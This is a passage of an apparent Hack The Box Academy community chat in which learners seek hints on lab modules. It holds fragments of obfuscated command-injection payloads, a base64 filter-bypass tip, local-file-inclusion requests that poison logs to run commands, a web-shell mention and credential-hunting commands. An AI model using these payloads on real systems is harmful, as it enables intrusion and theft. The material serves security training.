"Can't create/write to file '/var/www/html/proof.txt' (Errcode: 13 "Permission denied")"
however, if I create "/var/www/html/dashboard/shell.php" and get access, I can write, although the database user is root.
and whoami in the shell shows the user www-data,
is it really set up so that the root user has access only to the directory and subdirectories of "/var/www/html/dashboard/", and the www-data user has access to the root directory, am I right?
Yes you cannot write any files. You only have write permission of /var/www/html/dashboard/
Help me guys
Has anyone done the OutBound machine root flag?
#boxes is the place to ask for nudges for machines
@royal jetty
- don't spoil module information
- it's expecting the answer in the format of
sub1 sub2 sub3 without the domain
Is this module outdated? https://academy.hackthebox.com/module/details/17
Like it should not be done? I am asking irrespective of the exam.
It's not outdated completely, it still holds value imo
Since it was mentioned in this article https://www.hackthebox.com/blog/HTB-CWES-announcement, I wanted to get some clarification on that. They've mentioned that they will be replacing it with Attacking Common Application [New], so will they be adding more WordPress content that is already existing in the module? Thanks.
I know as much as in the blog post 🙂
You can see the module here: https://academy.hackthebox.com/module/details/113
Module name: Password attack
sub module: Credential Hunting in Network Shares
both question:
q1: One of the shares mendres has access to contains valid credentials of another domain user. What is their password?
methods i have tried:
method no1. docker run --rm -v ./manspider:/root/.manspider blacklanternsecurity/manspider 10.129.234.121 -c 'passw' -u 'mendres' -p 'Inlanefreight2025!'
i tried this it did work but took a really long time to process and canceled it mid way. and moved towards method no2 that i tried.
method no2. PS C:\Users\Public\PowerHuntShares> Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\Users\Public
i did not see anything that was helpful from this html it gave.
Again i did try c:\Users\Public>Snaffler.exe -s but i did not have Snaffler.exe i tried to create one from repo snaffler.sln but failed and having a hard time without Snaffler.exe.
I would really appreciate help i am hard stuck on this sub module.
I have been trying to resolve this issue for over a month.
have anyone completed command injections module?
keyword search may be more useful: In this case you have something to build off of -- DOMAIN user. Domain users on Windows are often in the format of domain\username
sorry your message got buried earlier, is the tl;dr your payload isn't properly coming through?
no i don't know if using grep command like that is right way or not. i want to know how to use <<< in place of | i have been checking like this t'ai'l%09<<<"$(g're'p%09"invalid"%09inde.php)" this works but when i use something like t'ai'l%09<<<"$(g're'p%09mysql<<<"$(g're'p%09"invalid"%09index.php)")" this is not working
wait i spawn my target and let you know every details above one is kinda rough since i am not currently doing it
i see your issue kinda immediately here, it's quote shenanigans
ah "shenanigans" what
as in your stuff is getting wrapped weirdly within quotes
i think i am missing something obvious ik
ah you means i am facing collosing in commands due to ",' ?
"$(g're'p%09mysql<<<"$(g're'p%09"invalid"%09index.php)")" gets split up into:
"$(g're'p%09mysql<<<"
$(g're'p%09
"invalid"
%09index.php)
")"
(I broke it up by ")
Can you help me too ?
i don't think that the case i have tried without " too
With the LLM output attacks module?
i would say base64 encode your payload, then b64 decode it, because it gets messy chaining multiple heredocs (the <<<)
@fathom pendant wait i just spawn my target let you know every payload i tried
okay i'll tried
the module is above tier 0; so no
don't share all your payloads
my dms currently aren't open, trying to maintain some semblance of normalcy.
yep the final assessment
yes @coarse leaf feel free to dm me
ah okay i'll share key points then delete my message if you fine with it
thanks for asking first
yeah it is not easy to answer every dm's if you have open it i can understand
you don't need to do any kind of encoding for the base command, the b64 already bypasses it
my main problem if i am not sure if i am using <<< correctly with grep
you might be getting very caught up on using grep
grep just reads files (or input)
should i delete it?
Hi 👋 I am new in this field can u guys guide me
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Thanks
i.e.
ls | grep "thing" greps for "thing" from the stdout of ls
wait broski i am middle of something here 🥀
no one person gets priority over another my guy
it's not like someone sent the entire bee movie script and bumped your message out the way
ik i just don't want to be overshadowed this is already my 3rd request
just have some patience, even if it's been pushed back before
mods aren't staff, and we're volunteers in the community. We help as we can
okay chill i was joking gng
met enough people that aren't ¯_(ツ)_/¯
ik but is this right <<<$(grep mysql<<<$(grep root))
i think i should figure out everything if this is right
chill if i was like that i should have spam my request
find /usr/share/ | grep root | grep mysql | tail -n 1 <<< this is the command you're meant to obfuscate
yeah right
oh wait i never focused on find lol sorry anyways f'in'd this should do the work
you don't need to nest them within each other like $(command <<< $(command <<< $(command) <<< $(command))))
chatgpt recommend me, yesterday someone said ask chatgpt
can you show an example then ?
<<<grep mysql <<< grep root
ah
tail <<< grep mysql <<< grep root <<< {f'in'd,...} right? let me try
consider you're telling the previous command in each chain "here is what you're looking at"
using an expected payload (with base64 -d) it worked just fine
you don't need to encode the initial payload you're encoding with base64
the base64 encoding in and of itself is a bypass
Hi all,
I'm doing Web Attacks - Bypassing Encoded References. I don't see any requests or parameter in Burp that contains the encoded string.
I don't see this request being made in Burp. Even after resetting the machine some times.
what a bad day to be slow, nvm i'll ask if i need any further help. thank you
found the other problem with your initial <<< payload
i'm willing to dm to talk you through the fix (i just spent some time tinkering through "Invalid input" errors
what
what g're'p worked fine fr i checked it 😮 , i checked with g're'p%09"invalid"%09index.php
which gave me ?>
not sure why you're trying to mess with index.php
just to check g're'p is working or i read the source code to know which words are blocked
ohmygod nvm that was wrong but i swear this {g're'p,"invalid",index.php} gave results earlier
it is not giving results now 😭
@fathom pendant can i dm you please i am creating a mess here
not sure why you're messing with index.php ¯_(ツ)_/¯
just focus on the given goal
because i want to check g're'p was working or not i don't find any file except index.php to try with
this sticker wasn't for your message btw

lets please keep this channel on topic
/etc/passwd is always a readable file, and so is /etc/hosts. root is always a user
localhost is generally always a host
oh okay at the start i ran {ls,-la} which return index.php and style.css so i used g're'p on that file.
that's because you're gonna be on the webroot of the server
(/var/www/html)
A little lost on the Password attacks modules skill assessment. I could need a nudge. I'm think I'm almost done but I seem to miss the point on how to proceed near the end
@fathom pendant
not sure the mess you've created; i already told you the fix to your initial mess. btw i think it's filtering out the substring 'val'
nvm it's filtering the whole string "invalid" lol
okay i have to go out for some work now, i'll do this later if you are online after 3-4 hours i'll ask you here if i need to, else i'll figure out on my own
thank you for assistance
I'm at the part where I did the pivot from DMZ01 -> JUMP01 but I have a hard time figuring out what to do next.
ah nvm, I guess I was making it too complicated.. wow
I was on the Linux Fundamentals Module - Section: Backup and Restore
What if you have a cronjob that runs the -delete option with rsync after your source directory has been wiped or something? And your backupserver also deletes everything there because the source is now empty.
Is there any way to circumvent that other than not including the -delete option in the rsync cronjob?
Hello
Hi everyone, are you also experiencing connectivity issues with the VM on the modules? Sometimes the services running on the VM randomly stop working, and I have to wait about 5 minutes before they start working again. I’ve tried resetting the VM, but the issue still happens :(
Yeah i got the same problem
hello guys!
i'm on the cpts path and i'm thinking about do the module windows fundamentals before password attacks to get more base and understand everything better.
what do you think??
You should take it yeah
```
python3 pwsafe2john.py ../../../Employee-Passwords_OLD.psafe3
Traceback (most recent call last):
  File "/home/attacker/Desktop/cpts/john/pwsafe2john.py", line 63, in <module>
    process_file(sys.argv[i])
  File "/home/attacker/Desktop/cpts/john/pwsafe2john.py", line 33, in process_file
    sys.stderr.write("%s : PWS3 magic string missing, is this a Password Safe file?\n", filename)
```
why it's not working ?
thank you i was able to clear it with this format
Hello
I am on Windows Privilege Escalation Module, I am solving Windows Group Privileges -> DNS Admin module, I followed every steps outlined in module, got myself into Domain Admins group or try to get shell as well. Still nothing works, any nudge would be helpful.
If you have added yourself to a new group, you must log out once and then log back in for the permissions to take effect.
I thought the same, I did. However, it didn't work!
There is no option to restart the target. However, I logged out and logged in again. Still didn't work!
hey i have been doing htb academy for a few weeks now and am done with basic modules such as linux fundamentals and network analysis, what is the best time to start HTB labs, what modules should i have completed before jumping to the labs
Privilege Escalation
@fathom pendant yooo i did it 🎉 the thing which take like 3-4 hours of work and still confused as hell. i did it in like 25 min and in first try of this session too🥳
I’m working on the Web server pivoting with Rpivot section in Pivoting tunneling and forwarding. I set up server.py on the attack host and client.py on the pivot host as it said in the text and made sure i had socks4 127.0.0.1 9050 in my proxychains.conf file but when I go to Firefox to open the site it says it can’t be reached. I tried resetting the machine but still can’t connect to the web server.
you were right about this 
anyone for command injection the advanced obfuscation. I need a sanity check, because i am banging my head against the wall since hours and have the feeling i'm missing a tiny part
Did anyone solve RDP and Socks tunneling with socksoverrdp in pivoting module with ligolo? This section is a double pivot, so I thought it would work, but for me it doesn't...
Really, if you got into with RDP there should be a "restart" option. Like any GUI windows 10 has.
It has only disconnect option, when I tried through powershell, it didn't work
hey can someone help me with a sanity check on the section content for
https://academy.hackthebox.com/module/144/section/1257
VHOSTS
the commands dont "work" for gobuster and feroxbuster to enumerate vhosts...
ffuf works same wordlist, right off the bat.
Hello there, I am almost at the skills assessment in the "Advanced XSS & CSRF", but I have an empty flag at Lab Warm-up. I obtain the flag but HTB says it is wrong. Can you guys help me about it?
Check if you have any spaces
Dm
Please refer to this image.
did you follow the next steps to load the dll and restart the service?
well. the generic advice is to login again, but if that doesn't help, you can use psexec and access the privileged directory. at first, I did the same until i got to know that i have to log-out and log back in for the privileges to persist.
https://academy.hackthebox.com/module/23/section/513
10.30.18.194 - - [19/Aug/2025:13:59:06 +0000] "GET /ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=id HTTP/1.1" 200 4316 "-" ""
10.30.18.194 - - [19/Aug/2025:13:59:39 +0000] "GET /ilf_admin/index.php?log=../../../../../var/log/nginx/access.log&cmd=ls%20/ HTTP/1.1" 200 4500 "-"
Why don't I see the output in the response?
Quick yes/no on https://academy.hackthebox.com/module/144/section/1311 if someone will humor me - Info Gathering Assessment
Subdomains, crawling, 🤖, subdomain of subdomain
Those are the broadest brushes I can give
thx i did actually get where i needed to be but i think theres some problems on the application.
the web server configuration
If its about the admin question; end it with /
i didnt think to do that but im past that already thankfully... i just have done some crawling on the fqdn and im not seeing any resources... automated crawling with zap and fuzzing with ffuf
Then you're on one of the latter questions. The last hint then is useful
ah ill skip a lil ahead and take a peek
Well the crawling answers a few questions
is there any idea why you have to put a / (or the entire path for that matter) for that admin Q?
that seems silly or is that robots.txt working? and curl abiding by it?
Likely configuration making it so that if its blank it appends the filetype [internally]
Curl doesnt read robots when accessing a resource directly
thats what i thought so im a lil confused
im restarting the box this is getting weird man
yeah i wish it would just throw up a box with the web server running on 80 im basically back in the same scenario i can already tell
As i said adding the / should pull it
Also making sure you curl http://do.main:port/resource_here/
Well the tl;dr: you have to point things in the right direction. The port is important
Im with you there. I think my lack of familiarity of dealing with web servers that have vhosts but want to serve on ports other than 80/443 was new to me when i did this lab but even when i specify the port such as in curl requests and even active scans that are instructed to use the port im getting just the most odd behavior ever. im now actually in a worse place than i was before robots is returning as a resource in the scan results but 404'ing
Hi, I'm working on https://academy.hackthebox.com/module/147/section/1356. I got the ssh for betty working. Also got the smb credentials, but my issue is I can't find the smbclient on DMZ01. Need some guidance ty
Im assuming you added the vhost in your /etc/hosts file
The best answer here is just pivoting
I added the -D 9050 when doing ssh
I did yes T_T''
And its added in the format ip hostname ?[no port]
yup. can i share a curl here? its benign
Look into ligolo-ng
If youre hunting subdomains,
ffuf -u http://do.main:port -H "HOST: FUZZ.do.main" -w /your/list/here
at the moment im just trying to get robots.txt to return a 200 along with its contents.
The main thing is using the Host header